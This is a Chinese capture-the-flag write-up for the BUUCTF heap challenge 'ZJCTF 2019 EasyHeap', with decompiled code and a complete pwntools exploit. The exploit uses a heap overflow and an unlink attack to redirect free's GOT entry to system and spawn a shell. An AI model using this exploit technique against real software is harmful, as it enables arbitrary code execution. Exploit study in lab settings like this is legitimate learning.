BUUCTF [ZJCTF 2019]EasyHeap

news2025/5/30 14:11:34

前置知识点:

unlink知识点和手法-CSDN博客

[ZJCTF 2019]EasyHeap

[ZJCTF 2019]EasyHeap

1.准备

2.ida分析
main函数
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  int n3; // eax
  char buf[8]; // [rsp+0h] [rbp-10h] BYREF
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      read(0, buf, 8uLL);
      n3 = atoi(buf);
      if ( n3 != 3 )
        break;
      delete_heap();
    }
    if ( n3 > 3 )
    {
      if ( n3 == 4 )
        exit(0);
      if ( n3 == 4869 )
      {
        if ( (unsigned __int64)magic <= 0x1305 )
        {
          puts("So sad !");
        }
        else
        {
          puts("Congrt !");
          l33t();
        }
      }
      else
      {
LABEL_17:
        puts("Invalid Choice");
      }
    }
    else if ( n3 == 1 )
    {
      create_heap();
    }
    else
    {
      if ( n3 != 2 )
        goto LABEL_17;
      edit_heap();
    }
  }
}

就有一个堆题正常的菜单,有增删改功能,依次查看

1-create_heap函数
unsigned __int64 create_heap()
{
  int i; // [rsp+4h] [rbp-1Ch]
  size_t size; // [rsp+8h] [rbp-18h]
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  for ( i = 0; i <= 9; ++i )
  {
    if ( !*(&heaparray + i) )
    {
      printf("Size of Heap : ");
      read(0, buf, 8uLL);
      size = atoi(buf);
      *(&heaparray + i) = malloc(size);
      if ( !*(&heaparray + i) )
      {
        puts("Allocate Error");
        exit(2);
      }
      printf("Content of heap:");
      read_input(*(&heaparray + i), size);
      puts("SuccessFul");
      return __readfsqword(0x28u) ^ v4;
    }
  }
  return __readfsqword(0x28u) ^ v4;
}

这里是添加堆块,限制了创建堆块的个数和大小

3-delete_heap函数
unsigned __int64 delete_heap()
{
  int n0xA; // [rsp+Ch] [rbp-14h]
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  n0xA = atoi(buf);
  if ( (unsigned int)n0xA >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *(&heaparray + n0xA) )
  {
    free(*(&heaparray + n0xA));
    *(&heaparray + n0xA) = 0LL;
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v3;
}

没存在UAF漏洞

2-edit函数
unsigned __int64 edit_heap()
{
  int n0xA; // [rsp+4h] [rbp-1Ch]
  __int64 size; // [rsp+8h] [rbp-18h]
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  n0xA = atoi(buf);
  if ( (unsigned int)n0xA >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *(&heaparray + n0xA) )
  {
    printf("Size of Heap : ");
    read(0, buf, 8uLL);
    size = atoi(buf);
    printf("Content of heap : ");
    read_input(*(&heaparray + n0xA), size);
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v4;
}

这里修改堆块数据,但没有限制用户输入内容的大小,当修改堆块大小大于原本堆块大小,并且修改内容大于原本大小时,会造成堆溢出。

4869-l33t函数(后门函数)

发现在选择4869的时候,会对magic的数据进行大小判断,当其不小于等于0x1305的时候,有一个l33t函数

int l33t()
{
  return system("cat /home/pwn/flag");
}

这里是一个连接点

3.EXP
思路:

这题有堆溢出和连接点,一开始想着去改magic,触发连接点,但能力不太行,正好这题可以用unlink,就当做学习unlink的一道例题
因为不用连接点,但可以用system函数,所以我们可以想办法写入'/bin/sh'
1.构造一个fake_chunk(伪造堆块),触发unlink
2.通过覆盖free_got地址为system地址,将free函数的调用重定向到system函数
3.最后通过添加删除带有'/bin/sh'内容的堆块,获得flag
先创建三个堆块,前两个chunk0和chunk1用于unlink,第三个chunk2写入内容'/bin/sh',用于最后释放,触发连接

from pwn import *
context.log_level = "debug"
# io=remote('node5.buuoj.cn',28246)
io= process('/home/motaly/heap')
elf=ELF('/home/motaly/heap')
libc=ELF('/home/motaly/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')

def add(size,content):
    io.sendlineafter("Your choice :", "1")
    io.sendlineafter("Size of Heap :", str(size))
    io.sendlineafter("Content of heap:", content)

def delete(index):
    io.sendlineafter("Your choice :", "3")
    io.sendlineafter("Index :", str(index))

def edit(index,size, content):
    io.sendlineafter("Your choice :", "2")
    io.sendlineafter("Index :", str(index))
    io.sendlineafter("Size of Heap :", str(size))
    io.sendlineafter("Content of heap :", content)

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

然后构造一个fake_chunk(伪造堆块),这里的目标地址是heaparray的0x6020E0

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)

把构造的fake_chunk写入chunk0

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)

edit(0,0x60,payload)


在释放1块,触发unlink

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)

edit(0,0x60,payload)
delete(1)

我们加上偏移,然后把free_got的地址写入

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)

edit(0,0x60,payload)
delete(1)

payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)

这里写入的是heaparray[0],对应了chunk0

接着覆盖free_got地址为system地址,将free函数的调用重定向到system函数

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)

edit(0,0x60,payload)
delete(1)

payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)

edit(0,8,p64(elf.plt['system']))
success("system_plt is: " + hex(elf.plt['system']))


最后释放带有'/bin/sh'内容2块,形成system('/bin/sh'),触发连接

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)

edit(0,0x60,payload)
delete(1)

payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)

edit(0,8,p64(elf.plt['system']))
success("system_plt is: " + hex(elf.plt['system']))

delete(2)
脚本
from pwn import *
context.log_level = "debug"
# io=remote('node5.buuoj.cn',28246)
io= process('/home/motaly/heap')
elf=ELF('/home/motaly/heap')
libc=ELF('/home/motaly/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')

def add(size,content):
    io.sendlineafter("Your choice :", "1")
    io.sendlineafter("Size of Heap :", str(size))
    io.sendlineafter("Content of heap:", content)

def delete(index):
    io.sendlineafter("Your choice :", "3")
    io.sendlineafter("Index :", str(index))

def edit(index,size, content):
    io.sendlineafter("Your choice :", "2")
    io.sendlineafter("Index :", str(index))
    io.sendlineafter("Size of Heap :", str(size))
    io.sendlineafter("Content of heap :", content)

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)

edit(0,0x60,payload)
delete(1)

payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)

edit(0,8,p64(elf.plt['system']))
success("system_plt is: " + hex(elf.plt['system']))

delete(2)

io.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2387070.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

机器学习AI精准预测复合材料性能、材料结构设计优化;数据驱动加速新材料研发,百年难遇的组合打破科研壁垒!

机器学习AI精准预测复合材料性能、材料结构设计优化;数据驱动加速新材料研发,百年难遇的组合打破科研壁垒!

在人工智能与复合材料技术融合的背景下&#xff0c;复合材料的研究和应用正迅速发展&#xff0c;创新解决方案层出不穷。从复合材料性能的精确预测到复杂材料结构的智能设计&#xff0c;从数据驱动的材料结构优化到多尺度分析&#xff0c;人工智能技术正以其强大的数据处理能力…
阅读更多...
apache http client连接池实现原理

apache http client连接池实现原理

在java开发中我们经常会涉及到http 请求接口&#xff0c;一般有几种方式&#xff1a; java自带的 HttpURLConnectionokHttpClientapache http client 一般我们使用apache http client会比较多点&#xff0c;在代码中会进行如下调用方式&#xff1a; private static class Htt…
阅读更多...
MD5加密(Java)

MD5加密(Java)

首先来看数据库里的一张员工信息表&#xff1a; 问题&#xff1a; 员工表中的密码是明文存储&#xff0c;安全性太低。 解决思路&#xff1a; 将明文密码加密后存储&#xff0c;提高安全性。 加密方式有很多&#xff0c;这里简单介绍 MD5加密方式 &#xff1a; (详细解释请转…
阅读更多...
[攻防世界] easyphp writeup

[攻防世界] easyphp writeup

知识点 科学计数法的妙用 9e9 指定结尾MD5值的爆破array_search() 函数用于在数组中搜索某个值&#xff0c;并返回对应的键名。如果找不到该值&#xff0c;则返回 false 默认值匹配&#xff1a;可以利用整数绕过字符串匹配机制stricttrue时&#xff0c;数据类型和值都需要匹配…
阅读更多...
如何不规范的设置密码

如何不规范的设置密码

上来就干 当我们使用服务器的时候&#xff0c;有时候需要一些非常简单的密码&#xff0c;来方便使用&#xff0c;但是自己完全可控的环境下&#xff0c;我们希望我们的密码足够的简单&#xff0c;比如&#xff0c;可能它的密码就是123&#xff0c;或者是1&#xff1f; 但是当你…
阅读更多...
分享全国数字人才技能提升师资培训班 第五期邀请函

分享全国数字人才技能提升师资培训班 第五期邀请函

线下&#xff08;广州班&#xff09;&#xff1a; 大模型与AIGC多模态技术应用实战 线下&#xff08;青岛班&#xff09;&#xff1a; Deepseek教学应用与智能体开发实战 线上班&#xff08;十二大专题&#xff09;&#xff1a; DeepSeek大模型教学应用实战 大模型与AIGC技…
阅读更多...
【Spring AI集成实战】基于NVIDIA LLM API构建智能聊天应用:从配置到函数调用全解析

【Spring AI集成实战】基于NVIDIA LLM API构建智能聊天应用:从配置到函数调用全解析

【Spring AI集成实战】基于NVIDIA LLM API构建智能聊天应用&#xff1a;从配置到函数调用全解析 前言 在人工智能应用开发领域&#xff0c;大语言模型&#xff08;LLM&#xff09;的集成能力至关重要。NVIDIA作为全球领先的GPU厂商&#xff0c;其LLM API提供了对Meta Llama-3.…
阅读更多...
Redis实战-缓存篇(万字总结)

Redis实战-缓存篇(万字总结)

前言&#xff1a; 今天结合黑马点评这个项目&#xff0c;讲下有关Redis缓存的一些内容&#xff0c;例如缓存更新策略&#xff0c;缓存穿透&#xff0c;雪崩和击穿等。 今日所学&#xff1a; 什么是缓存缓存更新策略缓存穿透缓存雪崩缓存击穿缓存工具封存 目录 1.什么是缓存…
阅读更多...
Python学习笔记--Django 表单处理

Python学习笔记--Django 表单处理

注意&#xff1a;本笔记基于python 3.12,django 5版本&#xff0c;不同版本使用上有些许差别。 HTML表单是网站交互性的经典方式。下面介绍如何用Django对用户提交的表单数据进行处理。 HTTP 请求 HTTP协议以"请求&#xff0d;回复"的方式工作。客户发送请求时&am…
阅读更多...
历年福州大学保研上机真题

历年福州大学保研上机真题

2025福州大学保研上机真题 2024福州大学保研上机真题 2023福州大学保研上机真题 在线测评链接&#xff1a;https://pgcode.cn/problem?classification1 螺旋矩阵 题目描述 给定一个整数 n n n&#xff0c;要求打印出一个 n n n \times n nn 的螺旋矩阵。 例如&#xff…
阅读更多...
大模型学习笔记day2 LoRA微调

大模型学习笔记day2 LoRA微调

LORA的核心思想基准模型不进行变化&#xff0c;我额外引入一部分参数来做专属内容处理&#xff0c;同时加上原有模型的推理能力&#xff0c;这部分新增加的的内容就是要训练出来的参数矩阵。 本征维度&#xff08;Intrinsic Dimension&#xff09;&#xff1a;是指数据或空间中…
阅读更多...
Maven-概述-介绍安装

Maven-概述-介绍安装

目录 1.项目对象模型 2.依赖管理模型 3.仓库&#xff1a;用于存储资源&#xff0c;管理各种jar包 4.本地仓库路径 5.Maven配置本地仓库 5.1在Maven路径下新建文件夹用于本地仓库存储 5.2 复制本地仓库路径 5.3 找到配置文件路径&#xff0c;使用VSCode方式打开 5.4 新…
阅读更多...
GitHub Page填写域名显示被占用

GitHub Page填写域名显示被占用

问题描述 在Github上使用github page搭建个人博客&#xff0c;在项目中的Settings->Pages页面里面填写个人的域名时&#xff0c;出现如下报错信息&#xff0c;显示域名被占用情况 The custom domain example.com is already taken. If you are the owner of this domain, c…
阅读更多...
java高级 -动态代理

java高级 -动态代理

动态代理的概念 动态代理是一种在运行时生成代理对象的机制&#xff0c;无需手动编写代理类。 代理就类似于中介公司&#xff0c;为明星置办各种前期准备。例如歌声需要开演唱会唱歌&#xff0c;那么此时就需要代理对象进行置办场地&#xff0c;设备&#xff0c;然后明星只需要…
阅读更多...
机器学习算法:线性回归

机器学习算法:线性回归

1. 基础概念 线性回归是一种用于建模连续型目标变量&#xff08;如价格、销量、温度&#xff09;与一个或多个特征变量&#xff08;如面积、广告投入、时间&#xff09;之间线性关系的统计方法。 核心思想&#xff1a;找到一条直线&#xff08;或超平面&#xff09;&#xff0…
阅读更多...
常见小问题(Open Folder as PyCharm Project)

常见小问题(Open Folder as PyCharm Project)

1.删除pycharm鼠标右键快捷键打开项目 winr键打开&#xff0c;输入regedit&#xff0c;运行注册器 找到下面的路径&#xff1a;计算机\HKEY_CLASSES_ROOT\Directory\Background\shell\PyCharm 删除即可
阅读更多...
第四十四节:目标检测与跟踪-模板匹配

第四十四节:目标检测与跟踪-模板匹配

一、引言 模板匹配的核心思想是通过在输入图像中搜索与预定义模板最相似的区域来定位目标。这种方法计算效率高、实现简单,特别适用于目标外观变化不大且背景相对简单的场景。本文将深入探讨模板匹配的原理、OpenCV中的实现方法、优化技巧以及实际应用案例。 二、模板匹配基础…
阅读更多...
vue+ThreeJs 创建过渡圆圈效果

vue+ThreeJs 创建过渡圆圈效果

嗨&#xff0c;我是小路。今天主要和大家分享的主题是“vueThreeJs 创建过渡圆圈效果”。 今天在做着色器过渡效果练习&#xff0c;发现出现了很多新的函数&#xff0c;这些都超出了js之外&#xff0c;需要更多的掌握和学习。以下是自己的复盘和梳理。 1.获取距离 定…
阅读更多...
MySQL:12_视图

MySQL:12_视图

视图 跟事务里讲的视图没有任何关系 视图是一个虚拟表&#xff0c;其内容由查询定义。同真实的表一样&#xff0c;视图包含一系列带有名称的列和行数据。视图的数据变化会影响到基表&#xff0c;基表的数据变化也会影响到视图。 一.基本使用 创建视图 create view 视图名 …
阅读更多...
win11+vs2022 安装opencv 4.11.0图解教程

win11+vs2022 安装opencv 4.11.0图解教程

1. 下载opencv opencv官网下载地址&#xff1a;Releases - OpenCV 2. 双击运行该exe&#xff0c;即可进行安装&#xff0c;安装文件夹可自行选择 安装后目录如下&#xff1a; 3. 配置环境变量 使用win键搜索环境变量&#xff0c;选中系统变量中的Path&#xff0c;然后点击编辑…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023